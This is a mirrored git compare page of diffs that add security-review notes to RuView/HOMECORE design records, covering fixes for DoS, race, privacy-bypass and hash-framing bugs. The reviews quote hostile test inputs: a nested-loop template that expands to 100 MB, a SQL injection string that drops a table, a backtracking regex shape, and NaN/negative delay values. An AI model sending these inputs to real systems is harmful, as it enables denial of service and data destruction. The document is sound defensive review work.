mirror of
https://github.com/ruvnet/RuView
synced 2026-06-15 11:13:20 +00:00
Compare commits
16 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 90a88ada9a | |||
| cfd0ad76cf | |||
| 71e8756051 | |||
| 5287497a4a | |||
| bf1dfe79fd | |||
| 9b126e927e | |||
| 41bee64593 | |||
| 5bc3b634b7 | |||
| e1f4897269 | |||
| 9f80b66ae3 | |||
| 02cb84e0bb | |||
| ebfaee4437 | |||
| db3d94a313 | |||
| a369fbe66e | |||
| d2089c342a | |||
| 306d009e72 |
File diff suppressed because one or more lines are too long
@@ -1092,6 +1092,12 @@ Two robustness bugs were fixed in the on-device edge path (`firmware/esp32-csi-n
|
||||
|
||||
Both are pinned by host-buildable C99 tests in `firmware/esp32-csi-node/test/test_vitals_count_presence.c` (`make run_vitals`). The exact thresholds are documented constants pending on-device calibration against ground truth.
|
||||
|
||||
### 2026-06 — Rust `wifi-densepose-vitals`: IIR filter NaN/inf self-heal (ADR-158 §A1)
|
||||
|
||||
A correctness/safety review of the Rust extraction crate found a real bug parallel to the firmware robustness class above. The 2nd-order resonator `bandpass_filter` in both `breathing.rs` and `heartrate.rs` latches each output `y[n]` into its filter state (`y1`/`y2`). A single non-finite amplitude residual from a corrupt CSI frame produced a NaN `output` that was written into the state; the existing `extract()` `is_finite()` guard dropped that one sample from the history buffer **but never sanitized the poisoned filter state**, so every later output stayed NaN, was rejected too, and the sliding-window history never refilled — breathing **and** heart-rate extraction went silently dead (returning `None` forever) until `reset()`. On the alert path this is a safety-relevant denial of service (one bad frame stops vitals monitoring with no error surfaced).
|
||||
|
||||
Fix: when `bandpass_filter` computes a non-finite `output`, it resets the IIR state to default and returns `0.0`, so the resonator self-heals on the next clean frame (the `0.0` is still dropped by the caller's finite-check, so no spurious sample enters history). Same shape as the calibration NaN bug (ADR-154 §3) — the prior hardening guarded the *history boundary* but not the *filter-state boundary*. Pinned by `breathing::tests::nan_frame_does_not_permanently_poison_filter`, `breathing::tests::inf_mid_stream_does_not_freeze_history`, and `heartrate::tests::nan_frame_does_not_permanently_poison_filter` (all FAIL pre-fix, verified by reverting). The review also de-magicked the HR physiological plausibility band into named `HR_PLAUSIBLE_MIN_BPM`/`HR_PLAUSIBLE_MAX_BPM` consts (value-identical 40/180 BPM) and added a fabricated-vital negative (`pure_noise_is_never_reported_valid` — broadband noise never yields a clinically `Valid` HR; the extractor honestly returns low-confidence `Unreliable`). Clean dimensions confirmed with evidence: flat/silent input → `None`; pure noise → low-confidence `Unreliable`, never `Valid`; harmonic-rich breathing with no cardiac component → low-confidence, not a confident false HR; out-of-band BPM rejected by the plausibility clamp.
|
||||
|
||||
## References
|
||||
|
||||
- Ramsauer et al. (2020). "Hopfield Networks is All You Need." ICLR 2021. (ModernHopfield formulation)
|
||||
|
||||
@@ -104,6 +104,57 @@ Ranked by build cost × user impact:
|
||||
| **P9** | HACS integration repo (`hass-wifi-densepose`) for HA-side install path | pending |
|
||||
| **P10** | Witness bundle + CSA-style spec compliance check | pending |
|
||||
|
||||
## 4.1 Crypto/security review notes (§2.2 witness chain — ADR-262 P2 prerequisite)
|
||||
|
||||
Beyond-SOTA crypto+security review of the SHA-256 + Ed25519 witness chain
|
||||
(`witness.rs` / `witness_signing.rs`) and the manifest signature surface
|
||||
(`manifest.rs`), because ADR-262 P2 proposes to **reuse this exact signing
|
||||
chain**. Top priority was the sibling `wifi-densepose-engine` bug class —
|
||||
unframed boundary-to-boundary concatenation of operator-influenceable strings
|
||||
into a signed/hashed digest.
|
||||
|
||||
- **Engine bug class ABSENT (good result, reported with byte evidence).**
|
||||
`canonical_bytes` is `DOMAIN_TAG ‖ prev_hash[32] ‖ seq:u64-be ‖ ts:u64-be ‖
|
||||
kind_len:u32-be ‖ kind ‖ payload_len:u32-be ‖ payload`. The two
|
||||
variable-length operator-influenceable fields (`kind`, `payload`) are
|
||||
**length-prefixed**; the fixed-width fields are self-delimiting → the
|
||||
encoding is injective (no two distinct event tuples share a preimage). The
|
||||
Ed25519 signature signs the **identical** bytes the SHA-256 chain commits to.
|
||||
No separate unframed concatenation exists; the manifest `binary_signature`
|
||||
is signed at build time (Makefile) over a single fixed-length `binary_sha256`
|
||||
hex value, not in-crate.
|
||||
|
||||
- **CHM-WIT-01 (FIXED) — domain-separation tag added.** The engine fix
|
||||
prescribed *domain-tag + length-prefix*; length-prefix was present, the
|
||||
domain tag was not. Added a versioned, NUL-terminated
|
||||
`WITNESS_DOMAIN_TAG = b"cog-ha-matter/witness-event/v1\x00"` prefix so the
|
||||
witness message can never be replayed as a message for another Ed25519
|
||||
context that shares key infrastructure (notably the manifest signature).
|
||||
**Witness bytes change by design** (prior on-disk hashes/signatures
|
||||
invalidated, as with the engine fix); verified safe because no in-repo crate
|
||||
consumes cog-ha-matter witness bytes programmatically (doc-mentions only).
|
||||
|
||||
- **CHM-WIT-02 (HARDENED) — `verify_signature` now uses `verify_strict`.** For
|
||||
an audit chain the signature is the attestation, so non-canonical encodings
|
||||
and small-order keys are rejected (RFC 8032 strict), giving the "one
|
||||
canonical signature per event" property. Not a forgery fix — the verifying
|
||||
key is caller-pinned, never read from the event.
|
||||
|
||||
- **Confirmed clean (with evidence):** verify-before-trust + key-pinning
|
||||
(`verify_signature` takes the verifying key as a parameter; `read_jsonl`
|
||||
re-derives every hash and chain-verifies); key handling (the crate never
|
||||
generates/stores/logs/serializes a signing key — only a documented test-only
|
||||
fixed seed; production keys come from the Seed secure store, out of scope);
|
||||
determinism (positional bytes, deterministic Ed25519, alphabetically-locked
|
||||
JSONL field order, sorted TXT records — no HashMap/float nondeterminism feeds
|
||||
any digest); fail-closed parsing (structured errors, no panics; `main.rs`
|
||||
reads no untrusted files/paths).
|
||||
|
||||
Tests: `cog-ha-matter --no-default-features` 64 → **68**, 0 failed (CHM-WIT-01
|
||||
pinned by 4 fails-on-old tests across `witness.rs`/`witness_signing.rs`;
|
||||
CHM-WIT-02 guarded by a key-pinning test). Python deterministic proof
|
||||
unchanged (cog-ha-matter is off the signal proof path).
|
||||
|
||||
## 5. References
|
||||
|
||||
- ADR-101 — `cog-pose-estimation` packaging precedent (signed binaries on GCS, .cog manifest)
|
||||
|
||||
@@ -190,4 +190,78 @@ The entity registry is a `RwLock<HashMap<EntityId, EntityEntry>>` backed by an a
|
||||
|
||||
- `v2/crates/wifi-densepose-sensing-server/src/main.rs` — Axum + Tokio architecture pattern used throughout the existing server stack
|
||||
- `docs/adr/ADR-126-ruview-native-ha-port-master.md` — HOMECORE master; §5.5 crate naming; §6 compatibility contract; §5.1 RUVIEW-POLICY
|
||||
|
||||
---
|
||||
|
||||
## 9. Security & concurrency review (P1 core, beyond-SOTA sweep)
|
||||
|
||||
Foundational review of the `homecore` crate — the state store + event bus +
|
||||
service/entity registries every other HOMECORE module trusts. Same rigor as
|
||||
the ADR-129/130/132/133/161 sibling reviews. **Three real fixes (one
|
||||
concurrency, two hardening), each pinned by a fails-on-old test; the bus-lag
|
||||
and lock-discipline dimensions confirmed clean with evidence.**
|
||||
|
||||
- **HC-RACE-01 (state-set TOCTOU — lost / reordered `state_changed`, the
|
||||
crux). FIXED.** `StateMachine::set` did `get()` (releasing the DashMap
|
||||
shard lock) → compute the next snapshot + the no-op / `last_changed`
|
||||
decision → `insert()` (re-acquiring the lock) → `send()`. The
|
||||
read-modify-write was **not atomic** w.r.t. a concurrent writer on the
|
||||
same entity, contradicting §2.1's promise that "the writer atomically
|
||||
replaces the map entry." A writer that read a stale `old` could
|
||||
mis-classify a genuine transition as a no-op and **drop its
|
||||
`state_changed` event** (a missed automation trigger) or fire an event
|
||||
whose `new_state` duplicated the previously delivered one (a spurious
|
||||
trigger for any automation keyed on `old_state != new_state`). **Fix:**
|
||||
hold the shard write-lock across the entire read→decide→insert→fire
|
||||
sequence via `entry()`/`insert_entry()`; `tx.send` is non-blocking,
|
||||
non-async, and never re-enters the map, so firing under the shard lock
|
||||
cannot deadlock and keeps global event order in lock-step with global
|
||||
commit order. Pinned by `concurrent_set_fires_no_duplicate_adjacent_events`
|
||||
(4 writers toggling one entity A/B; asserts no two consecutive fired
|
||||
events carry an identical `new_state` — impossible under correct
|
||||
serialisation; a probe observed ~93k such duplicate-adjacent events across
|
||||
200 trials on the racy code, zero on the fix).
|
||||
- **HC-EID-LEN-01 (unbounded `entity_id` — memory-DoS at the REST boundary).
|
||||
FIXED.** `homecore-api/src/rest.rs` parses untrusted path segments
|
||||
straight through `EntityId::parse`; with no length cap, an
|
||||
otherwise-valid id (`a.` + many MB of `[a-z0-9_]`) was accepted and a
|
||||
`POST /api/states/<giant>` would persist it into the DashMap state store
|
||||
(permanent growth across distinct ids). **Fix:** reject ids longer than
|
||||
`MAX_ENTITY_ID_LEN` (255, HA-compatible) up front in `parse()`, before any
|
||||
per-char scan, with a new `EntityIdError::TooLong`; fail-closed at the
|
||||
boundary type protects every caller. Pinned by `entity_id_length_boundary`
|
||||
(exactly-MAX accepted, MAX+1 and a 4 MiB id rejected — fails on old code).
|
||||
- **HC-SVC-PANIC-01 (service-handler panic not isolated). HARDENED.**
|
||||
`ServiceRegistry::call` already ran handlers outside the registry lock (no
|
||||
`RwLock` poisoning, no blocking of other callers — clean), but a
|
||||
panicking handler unwound through `call()` into the caller's task. **Fix:**
|
||||
wrap the handler future in `AssertUnwindSafe` + `catch_unwind`, converting
|
||||
a panic to `ServiceError::HandlerPanicked`; the registry stays fully
|
||||
usable. Pinned by `panicking_handler_is_isolated_and_registry_survives`.
|
||||
|
||||
**Dimensions confirmed clean (with evidence):**
|
||||
|
||||
- **Event-bus bounds / lag (same class as the homecore-api WS lag-DoS).**
|
||||
Both `StateMachine` and `EventBus` use bounded `tokio::sync::broadcast`
|
||||
(capacity 4,096). A slow subscriber gets a recoverable `Lagged(n)`
|
||||
(drop-oldest + re-sync); `fire_*` is non-blocking and **never waits on
|
||||
slow receivers**, so a lagging subscriber cannot block the publisher, grow
|
||||
the channel without bound, or take down a fast subscriber. Evidenced by
|
||||
`slow_subscriber_does_not_block_publisher_or_kill_the_bus` (fire 3×
|
||||
capacity at an idle subscriber; publisher unblocked, bus stays live).
|
||||
- **Lock ordering / lock-across-await (deadlock).** No code path holds two
|
||||
of `{state DashMap, registry RwLock, service RwLock}` simultaneously, so
|
||||
no inconsistent-ordering deadlock can exist. Every `tokio::sync::RwLock`
|
||||
guard in `registry.rs`/`service.rs` is used in a single synchronous
|
||||
statement and dropped before any `.await`; `call` explicitly scopes the
|
||||
read guard out before awaiting the handler. The only guard held across a
|
||||
send is the DashMap shard lock in `set`, across a synchronous
|
||||
(non-await) broadcast send — safe.
|
||||
- **Panic-on-input.** No reachable `unwrap`/`expect`/index in non-test code
|
||||
beyond the safe `send().unwrap_or(0)` and the dead-but-harmless
|
||||
`split_once(...).unwrap_or(...)` fallbacks on already-validated ids.
|
||||
|
||||
`cargo test -p homecore --no-default-features`: **20 → 24 passed, 0 failed**
|
||||
(+4 pins). Workspace green; Python deterministic proof unchanged
|
||||
(`f8e76f21…46f7a`, bit-exact — `homecore` is off the signal proof path).
|
||||
- `docs/adr/ADR-028-esp32-capability-audit.md` — witness chain pattern (Ed25519 per state transition)
|
||||
|
||||
@@ -190,6 +190,23 @@ This is the same Wasmtime host already used for integration plugins (ADR-128)
|
||||
|
||||
---
|
||||
|
||||
## 8a. Security review (beyond-SOTA sweep, post ADR-154–159)
|
||||
|
||||
A focused security review of `homecore-automation` (the execution/eval surface — triggers → conditions → actions, with templates) was run after the ADR-154–159 sweep, applying the same rigor that the sibling engine/bfld/calibration/vitals/geo reviews used. **Two real DoS findings, each pinned by a fails-on-old test; the condition-bypass, fail-closed-parsing, and action-authorization dimensions were probed and found clean.**
|
||||
|
||||
- **HC-SEC-01 (template-injection / unbounded-expansion DoS, HIGH) — FIXED.** A `template:` condition / `value_template` is user automation config, and was rendered with MiniJinja's defaults: **no instruction budget, no output cap**. A single condition such as `{% for i in range(5000) %}{% for j in range(5000) %}xxxx{% endfor %}{% endfor %}` rendered a **100 MB string over ~11 s on one render call** (measured) — a CPU/memory denial of service (the bfld-class "unbounded expansion"; MiniJinja's per-call `range()` 10k cap does **not** stop nested loops). **Fix:** enable MiniJinja's `fuel` feature and set a per-render budget (`set_fuel(Some(1_000_000))`) so a nested loop burns one unit per iteration — the attack now fails fast (~90 ms) with "engine ran out of fuel"; plus a 64 KiB source-length cap rejecting pathological sources before compilation. Legitimate HA templates (a few dozen instructions) are unaffected. Pinned by `nested_loop_template_is_bounded_not_unbounded_dos`, `single_huge_repeat_template_is_bounded`, `oversized_template_source_is_rejected` (all fail-on-old: unbounded render / no rejection), and `legitimate_template_still_renders_within_fuel` (no regression).
|
||||
- **HC-SEC-02 (panic-on-config DoS, MEDIUM) — FIXED.** `Action::Delay { seconds }` and `Action::WaitForTrigger { timeout_seconds }` fed the user-supplied float straight into `Duration::from_secs_f64`, which **panics** on negative, NaN, infinite, or overflowing inputs — all reachable from a crafted (or typo'd) YAML (`delay: {seconds: -1}`, `.nan`, `.inf`, `1e308`). One hostile config aborts the spawned automation run task with a panic (measured: "cannot convert float seconds to Duration: value is negative"). **Fix:** a `safe_duration_from_secs` guard that saturates instead of panicking (NaN/±inf/negative → `Duration::ZERO`, matching HA's lenient "non-positive delay = no delay"; absurdly large → clamped to ~100 years). Pinned by `delay_negative_seconds_does_not_panic`, `delay_nan_seconds_does_not_panic`, `delay_infinite_seconds_does_not_panic`, `wait_for_trigger_negative_timeout_does_not_panic`, `safe_duration_saturates_hostile_values` (incl. overflow clamp).
|
||||
|
||||
**Dimensions confirmed clean (with evidence):**
|
||||
- **Condition bypass / fail-closed eval** — a `Condition::Template` whose render errors evaluates to `false` (`condition.rs` `Err(_) => false`), and a `Choose` branch condition that fails to deserialize is treated as **non-matching** (the branch is skipped), not silently passing (`action.rs` `ChoiceBranch::matches` `Err(_) => return false`). Both fail **closed** (do-not-run), confirmed by the existing `choose_*` tests and template-false-blocks-action behavioral test. No true-by-default-on-parse-error path found.
|
||||
- **Re-entrancy / livelock (DoS)** — run-mode machinery is bounded and tested: `Single`/`IgnoreFirst` re-entrancy guard, `Restart` cancel-and-replace, `Queued` FIFO serialization, and `max: N` semaphore cap (ADR-162; `restart_mode_cancels_prior_run`, `queued_mode_runs_sequentially_not_concurrently`, `max_two_caps_concurrency_at_two`, `single_mode_does_not_double_fire_on_rapid_triggers`). A self-triggering automation does not livelock the engine — each fire is bounded by its run-mode.
|
||||
- **Action authorization** — templates are read-only sandboxed (`states`/`state_attr`/`is_state`/`now` globals; no service-call or state-set global is exposed to template scope), so a template cannot escalate into an action. Service authorization itself is enforced at the `homecore` service-registry boundary (out of this crate's scope); no gap found in what the automation crate enforces.
|
||||
- **Panic-on-config (parse)** — `serde_yaml`/`serde_json` deserialization returns structured `AutomationError` (no `unwrap`/`expect`/index reachable from a crafted config in the eval/exec path); the only remaining panic surface was the `from_secs_f64` path fixed as HC-SEC-02.
|
||||
|
||||
Validation: `cargo test -p homecore-automation --no-default-features` → 54 passed / 0 failed (+14 over baseline). Python deterministic proof unchanged (homecore-automation is off the signal-processing proof path).
|
||||
|
||||
---
|
||||
|
||||
## 9. References
|
||||
|
||||
### HA upstream
|
||||
|
||||
@@ -120,6 +120,42 @@ tested; P3 is planned.
|
||||
HOMECORE-API (ADR-130, P3); automation conditions on historical state are
|
||||
HOMECORE-automation (ADR-129, P3).
|
||||
|
||||
## 3a. Security review (2026-06, post-ADR-154–159 sweep)
|
||||
|
||||
A beyond-SOTA security review of `homecore-recorder` covered SQL injection, retention/purge
|
||||
correctness, fail-closed write integrity, semantic-store NaN poisoning, and PII exposure.
|
||||
|
||||
**Confirmed clean (with evidence):**
|
||||
|
||||
- **SQL injection — clean.** Every query in `db.rs` uses bound `?` parameters; no user- or
|
||||
entity-influenceable value is interpolated into SQL via `format!`/concatenation. The only
|
||||
`format!` builds the `LIKE` *pattern* string, which is itself **bound** as a parameter with
|
||||
`ESCAPE '\\'` and `% _ \` escaping — so a metacharacter payload is matched literally. Pinned
|
||||
by `malicious_entity_id_is_stored_literally_not_executed` (a `'; DROP TABLE states; --` state
|
||||
value leaves the table intact and round-trips verbatim) and
|
||||
`like_metacharacters_in_query_are_literal_not_wildcards`.
|
||||
- **NaN-index poisoning — structurally impossible.** Embeddings are SHA-256 → `i32` →
|
||||
`f32`; an `i32`→`f32` cast is always finite (never NaN/Inf), and an all-zero-digest is
|
||||
guarded by the `norm > 1e-10` check. Empty-index search, empty-string query, and `k=0` were
|
||||
probed and all return `Ok(0)` with no panic. (Unlike the calibration/vitals/geo paths, no raw
|
||||
sensor float ever reaches the index.)
|
||||
- **Fail-closed writes.** A removal event returns `Ok(None)`; semantic-index failure is logged,
|
||||
not propagated, so it never blocks the durable SQLite write; `EntityId` parse failure falls
|
||||
back to a sentinel rather than panicking.
|
||||
|
||||
**Fixed (real bounding bugs):**
|
||||
|
||||
- **Memory-DoS — `get_state_history` was unbounded.** No `LIMIT`, so a wide time window over a
|
||||
high-frequency entity loaded an unbounded row set into memory. Now capped at
|
||||
`MAX_HISTORY_ROWS` (1,000,000); sibling search paths were already `k`-bounded.
|
||||
- **Disk-DoS / documented-but-missing `purge`.** The README advertised `Recorder::purge`, but
|
||||
no retention path existed → unbounded disk growth. Added a **transactional** `purge(older_than)`
|
||||
with an **exclusive** cutoff (idempotent, no off-by-one) that deletes old `states`/`events` and
|
||||
GCs orphaned `state_attributes` blobs (dedup-shared blobs kept until their last referrer is gone).
|
||||
|
||||
`homecore-recorder` tests: 19 → 25 (`--no-default-features`) / 25 → 31 (`--features ruvector`),
|
||||
0 failed. Python deterministic proof unchanged (recorder is off the signal proof path).
|
||||
|
||||
## 4. Links
|
||||
|
||||
- Crate: `v2/crates/homecore-recorder/` — `Cargo.toml`, `README.md`, `src/lib.rs`,
|
||||
|
||||
@@ -174,3 +174,71 @@ vs. an in-memory array at compile time), which intersects with ADR-084 (RabitQ)
|
||||
| **P1** (this ADR) | `intent`, `recognizer` (regex), `handler` (5 built-ins), `runner` (trait + noop), `pipeline` (end-to-end wiring), 10–15 tests |
|
||||
| **P2** | Real `tokio::process::Child` runner with Windows-safe teardown; `SemanticIntentRecognizer` with ruvector HNSW |
|
||||
| **P3** | STT/TTS bridge, satellite protocol, cloud fallback |
|
||||
|
||||
---
|
||||
|
||||
## 6. Security review (beyond-SOTA, untrusted-input → action path)
|
||||
|
||||
A focused security review of the Assist pipeline — `utterance → recognizer →
|
||||
intent → handler → action`, plus `RufloRunner` — treating the utterance as
|
||||
untrusted input (voice transcripts, the WebSocket `assist` command). This
|
||||
surface was not covered by the ADR-154–159 sweep.
|
||||
|
||||
### 6.1 Finding fixed — HC-ASSIST-01 (unbounded-utterance DoS, LOW)
|
||||
|
||||
Both `RegexIntentRecognizer::recognize` and the semantic `recognize_scored`
|
||||
accepted utterances of **unbounded length** and ran `to_lowercase()` (a full
|
||||
clone) + a per-registered-pattern scan (and, in the semantic path, full
|
||||
tokenisation + feature-hash embedding) before any bound — an allocation/CPU
|
||||
amplification on attacker-controlled input. The `regex` crate is **linear-time**
|
||||
(RE2-style finite automaton, no catastrophic backtracking), so this was a
|
||||
throughput/memory DoS, not a hang.
|
||||
|
||||
**Fix:** `MAX_UTTERANCE_BYTES = 4096` (far above any real spoken command),
|
||||
checked at **both** recognizer boundaries *before* any allocation/scan. An
|
||||
over-length utterance **fails closed** to `Ok(None)` — no intent, no action,
|
||||
identical to an unrecognised phrase — so it can never be coerced into firing a
|
||||
handler. Pinned by `over_length_utterance_fails_closed` (an over-length
|
||||
utterance that *contains* a valid command resolves to `None`, which would have
|
||||
matched on the old code) and `over_length_utterance_fails_closed_semantic`.
|
||||
|
||||
### 6.2 Dimensions confirmed clean (with evidence)
|
||||
|
||||
- **Command / argument injection — NO SUBPROCESS SURFACE.** The `RufloRunner`
|
||||
has exactly two impls: `NoopRunner` (no process) and `LocalRunner` (runs the
|
||||
local recognizer, no process). There is **no** `std::process` / `tokio::process`
|
||||
/ `Command` / process `.spawn()` anywhere in the crate — the trait `spawn` is
|
||||
only a `started: bool` lifecycle flag — and `RufloRunnerOpts.{script_path,env}`
|
||||
are **inert data, never consumed**. The live `node ruflo-agent.js` runner is
|
||||
genuinely data-gated/future (P2). Defence-in-depth: the `entity_id` capture
|
||||
class `[a-z_][a-z0-9_ .]*` **excludes every shell/SQL metacharacter**, so even
|
||||
when an injection-shaped utterance resolves (the regex is not exact-anchored),
|
||||
the captured slot is a clean token — sanitisation by construction. Pins:
|
||||
`shell_metachars_never_survive_into_a_resolved_slot`,
|
||||
`runner_opts_are_inert_no_process_spawned`,
|
||||
`pipeline_injection_shaped_utterance_carries_no_metachars_to_service`.
|
||||
- **ReDoS — STRUCTURALLY IMPOSSIBLE.** `regex 1.12.3` (no `fancy-regex` in the
|
||||
dependency tree) is linear-time; a classic `(a+)+$` shape on adversarial input
|
||||
completes in bounded time. Pin:
|
||||
`pathological_backtracking_pattern_completes_in_bounded_time`. Patterns are
|
||||
operator-registered, not user-supplied, in any case.
|
||||
- **NaN-poisoning — EMBEDDINGS STRUCTURALLY FINITE.** The embedding path takes
|
||||
only `&str` and produces values via FNV feature-hashing + a guarded L2
|
||||
normalise (`norm > 1e-12`); no external float input, no unguarded division, so
|
||||
a crafted utterance cannot inject NaN/Inf to poison the cosine k-NN. Cosine
|
||||
against the zero vector is a finite `0.0`; an empty index `max_by` returns
|
||||
`None` (no panic); the NaN-safe `partial_cmp().unwrap_or(Equal)` is already in
|
||||
place. Pins: `embeddings_are_structurally_finite`,
|
||||
`cosine_with_zero_vector_is_finite_not_nan`,
|
||||
`empty_utterance_against_empty_index_no_panic_no_match`.
|
||||
- **Intent confusion / fail-closed.** An unrecognised utterance → `not_understood()`
|
||||
(no service call); a recognised intent with no registered handler →
|
||||
`not_understood()`; semantic below-threshold / empty-index → regex fallback.
|
||||
No default high-privilege intent, no fail-open path.
|
||||
- **Panic-on-input.** No `unwrap`/`expect`/index reachable from a crafted
|
||||
utterance; the one `exemplars[id]` index uses an `id` from `enumerate()` over
|
||||
the append-only exemplar `Vec` (no remove API), so it is always in bounds.
|
||||
|
||||
`cargo test -p homecore-assist --no-default-features`: **29→36, 0 failed** (+7);
|
||||
default/`semantic`: **39→48, 0 failed** (+9). Python deterministic proof
|
||||
unchanged (homecore-assist is off the signal proof path).
|
||||
|
||||
@@ -495,3 +495,34 @@ Rejected. `ViewpointFusionEvent` (viewpoint/fusion.rs lines 183–219) is an int
|
||||
**Integration glue -- not yet on the live path:** emission of `CalibrationIdMismatch` / `DriftProfileConflict` / `PhaseAlignmentFailed` once `calibration_id` propagation and the phase-align convergence signal are threaded onto frames; the BFLD witness record emitted on privacy demotion.
|
||||
|
||||
**Trust contribution:** sensor *agreement made explicit* -- fusion records the evidence it relied on, and any disagreement automatically tightens the downstream privacy class.
|
||||
|
||||
---
|
||||
|
||||
## Witness Integrity Review (2026-06-14) — domain-separation fix
|
||||
|
||||
A beyond-SOTA security review of `wifi-densepose-engine` (the composition root
|
||||
that builds the §2.7 trust witness in `witness_of`) found a real **witness
|
||||
domain-separation gap**, now fixed.
|
||||
|
||||
**Finding (witness-gap, HIGH).** `witness_of` concatenated `model_version`,
|
||||
`calibration_version`, and `privacy_decision` boundary-to-boundary, and the
|
||||
variable-length `evidence` list carried no explicit count. A string straddling a
|
||||
field boundary therefore collided with a *different* trust decision —
|
||||
e.g. a per-room adapter id (ADR-150 §3.4, operator-influenceable) that absorbs
|
||||
the leading bytes of the calibration epoch (`model="…cal:00a"`, `cal="b"`)
|
||||
produces the **same** witness as `model="…"`, `cal="cal:00ab"`. Two distinct
|
||||
privacy-relevant input tuples → one witness defeats the "any privacy-relevant
|
||||
delta → different witness" guarantee this ADR's §2.7 witness exists to provide.
|
||||
|
||||
**Fix.** The witness now (a) prepends a domain tag `ruview.engine.witness.v1`,
|
||||
(b) writes an explicit 8-byte evidence count, and (c) **length-prefixes every
|
||||
field** (8-byte LE length ‖ bytes), so field framing is unambiguous regardless
|
||||
of contents. This is a witness-layout change (all prior witness bytes are
|
||||
invalidated by design); downstream consumers only assert witness *relationships*
|
||||
(`assert_ne`/`assert_eq` across runs), not absolute bytes, so nothing breaks.
|
||||
|
||||
Pinned by `witness_distinguishes_model_calibration_boundary` and
|
||||
`witness_distinguishes_evidence_model_boundary` (both fail on the old
|
||||
concatenation). Witness **determinism** was reviewed and confirmed clean: no
|
||||
HashMap iteration and no float formatting feed the hash (floats appear only in
|
||||
the `SemanticState` statement, which is outside the witness).
|
||||
|
||||
@@ -599,3 +599,53 @@ Per ADR-028/ADR-010, three rows are added to the witness log:
|
||||
**Integration glue -- not yet on the live path:** wiring the registry into `PrivacyGate` class transitions, the MQTT discovery payload, and a read-only Home Assistant diagnostic entity exposing the active mode + proof hash.
|
||||
|
||||
**Trust contribution:** the *policy spine* -- privacy posture is a tamper-evident, auditable chain rather than a checkbox; an operator's mode choice actively governs whether identity data may even exist.
|
||||
|
||||
---
|
||||
|
||||
## Privacy Monotonicity Review (2026-06-14) — confirmed clean
|
||||
|
||||
A beyond-SOTA security review of the governed-trust cycle
|
||||
(`wifi-densepose-engine::StreamingEngine::process_cycle_calibrated`) examined
|
||||
the privacy-demotion path this ADR governs. **The monotonicity invariant holds:
|
||||
demotion only ever makes the emitted class more restrictive, never less.**
|
||||
|
||||
Verification (no behaviour change, the result is a clean bill with evidence):
|
||||
|
||||
- Each cycle computes `effective_class` fresh from the active mode's
|
||||
`target_class()` (the floor) and applies at most a **single-step** demotion
|
||||
(`demote_one`, clamped at `Restricted`). There is no cross-cycle state that
|
||||
could let a permissive class overwrite a restrictive one.
|
||||
- A forced contradiction (calibration mismatch / array-geometry insufficiency /
|
||||
mesh partition risk, ADR-032) raises the class byte; a clean cycle emits
|
||||
exactly the base class.
|
||||
- Pinned by `forced_contradiction_never_relaxes_class`, a property test over
|
||||
**all five** `PrivacyMode`s asserting `effective_class.as_u8() >=
|
||||
base_class.as_u8()` (strictly greater unless already clamped at `Restricted`)
|
||||
under a forced contradiction, and `== base` on a clean cycle.
|
||||
|
||||
Fail-closed boundaries were also pinned: an empty cycle errors (no degenerate
|
||||
over-permissive output, `empty_cycle_fails_closed`) and the single-node boundary
|
||||
is characterized as a valid non-demoting mode (`single_node_cycle_is_well_formed`).
|
||||
|
||||
The related witness domain-separation fix from the same review is recorded in
|
||||
ADR-137 (the witness folds `effective_class`, so the demotion is auditable).
|
||||
## Security & Privacy Review (2026-06-14)
|
||||
|
||||
Beyond-SOTA privacy+security review of `wifi-densepose-bfld` (the crate was not in the ADR-154–159 sweep). Two real bugs fixed (each pinned by a fails-on-old test), several dimensions confirmed clean.
|
||||
|
||||
### Findings
|
||||
|
||||
| # | Severity | Site | Issue | Fix | Pinned by |
|
||||
|---|----------|------|-------|-----|-----------|
|
||||
| 1 | **privacy-bypass (HIGH)** | `pipeline.rs::process_to_frame` | The documented wire-bytes production path stamped the frame header with the active `PrivacyClass` but serialized the caller's `BfldPayload` **unchanged** via `BfldFrame::from_payload` — never routing through `PrivacyGate::demote`. A frame labeled `Anonymous`(2)/`Restricted`(3) carried the full `compressed_angle_matrix` (identity surface) + amplitude/phase + `csi_delta`. A `NetworkSink` accepts class ≥ `Derived`(1), so the identity surface could cross the node boundary despite the restrictive class byte — the byte lied about content. | Apply `PrivacyGate::demote(frame, active_class)` after construction: a same-class transition that strips the sections the class forbids; `Raw`/`Derived` keep the full payload. | `tests/pipeline_to_frame.rs::process_to_frame_at_anonymous_strips_identity_leaky_sections`, `…_in_privacy_mode_strips_amplitude_and_phase` (both FAILED pre-fix); `…_at_derived_preserves_full_payload` (over-strip guard) |
|
||||
| 2 | **PII/injection (MEDIUM)** | `mqtt_topics.rs::render_events` | `zone_activity` payload built as `format!("\"{zone}\"")` with no JSON escaping (while `ha_discovery.rs` already escapes). A zone name with `"`/`\` produced malformed/injectable JSON on the HA state topic. | `json_string_literal()` escaper mirroring `ha_discovery::push_str_field`. Value-identical for normal zone names. | `tests/mqtt_topic_routing.rs::zone_payload_escapes_json_metacharacters` (FAILED pre-fix) |
|
||||
|
||||
### Dimensions confirmed clean (with evidence)
|
||||
|
||||
- **Event-field privacy gating** — `BfldEvent::apply_privacy_gating` nulls `identity_risk_score` + `rf_signature_hash` at `Restricted`, and `serde(skip_serializing_if = "Option::is_none")` omits them entirely. `render_events`/`render_discovery_payloads` refuse class < `Anonymous` (stricter than the `sink.rs` `NetworkKind` `MIN_CLASS = Derived` — defense in depth toward less leakage). Covered by `event_privacy_gating.rs`, `mqtt_topic_routing.rs`, `ha_discovery.rs`.
|
||||
- **Witness/hash framing (the engine `witness_of` bug class)** — CLEAN. `SignatureHasher::compute` prefixes a **fixed 4-byte** `day_epoch` then a **fixed-width canonical-f32** feature block (`IdentityFeatures`: Embedding = `EMBEDDING_DIM*4`, RiskFactors = 16 B). `PrivacyAttestationProof::compute` hashes a fixed 32-byte `prev_hash` + three fixed 1-byte values. No variable-length operator-influenceable string is concatenated into any digest — no length-prefix-framing collision is possible.
|
||||
- **Fail-closed** — `payload.rs::from_bytes` rejects truncated/overflowing/trailing-byte sections (`checked_add`, bounds checks); `frame.rs::from_bytes` validates magic/version/length/CRC; `PrivacyClass::try_from` rejects unknown bytes; `identity_risk::score` maps NaN/degenerate factors → 0.0 (privacy-conservative). The `from_score(NaN) → Accept` choice is a documented, deliberate publish-aggregate-only fallback (NaN never reaches it from `score()`); risk-driven NaN cannot leak identity because identity gating is class-byte-driven, not risk-driven.
|
||||
|
||||
### Observation (not a bug)
|
||||
|
||||
